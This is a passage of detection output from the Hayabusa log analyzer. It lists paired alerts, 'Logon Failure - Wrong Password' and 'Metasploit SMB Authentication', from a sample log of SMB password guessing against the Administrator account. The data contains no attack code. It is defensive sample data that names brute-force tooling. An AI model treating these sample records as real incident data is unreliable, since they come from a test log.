Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
